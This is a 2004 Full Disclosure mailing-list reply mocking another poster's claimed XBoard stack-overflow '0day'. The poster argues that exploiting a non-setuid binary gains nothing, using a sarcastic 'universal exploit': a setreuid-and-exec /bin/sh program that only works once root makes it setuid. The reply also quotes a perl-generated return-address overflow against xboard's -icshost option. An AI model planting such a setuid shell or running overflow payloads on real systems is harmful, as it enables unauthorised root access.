Full Disclosure mailing list archives
Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerablity!
From: d4rk <d4rk () securitylab ru>
Date: Tue, 2 Mar 2004 12:01:08 +0300
/** ** ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY ! *
Oh yeah, xplo for non-suid prog is real oday. I can show u one universal exploit code for ALL linux/x86 boxes! And u will not need to exploit bofs in non-suid binaries in future! This is real 0day! Do-not-distribute!#@&(*)$#@
Are u ready??! Here it is:

====zer0-day====
#include <unistd.h>   /* for setreuid() and execl() */

int main(void)
{
    setreuid(0, 0);                          /* only does anything if the binary is setuid root */
    execl("/bin/sh", "sh", (char *)NULL);    /* argument list must be NULL-terminated */
    return 1;
}
=====end======

Let's check!

# gcc -o zer0-day linux-own.c
# su nobody
sh: /root/.bashrc: Permission denied
sh-2.05b$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

/* here we are waiting until somebody with root access makes it suid. */
/* or if root is your friend, u can ask him to do it. */
/* or if root == you, just su (chown root.root if needed) and chmod +s */
/* or somehow it will be suid by default? but I don't think so.. */
/* anyway... */

sh-2.05b$ ./zer0-day
sh-2.05b# id
uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
sh-2.05b#

Yea! We did it!!

narkotix@labs:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "\x7e\xfd\xff\xbf"x166'`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)   <-----on my box all of the programs r SUID :P just demonstrated.

As u c, on my box too =)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerablity! narkotix (Mar 01)
- Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerablity! d4rk (Mar 02)
- Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerablity! Valdis Kletnieks (Mar 02)
- Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerablity! d4rk (Mar 02)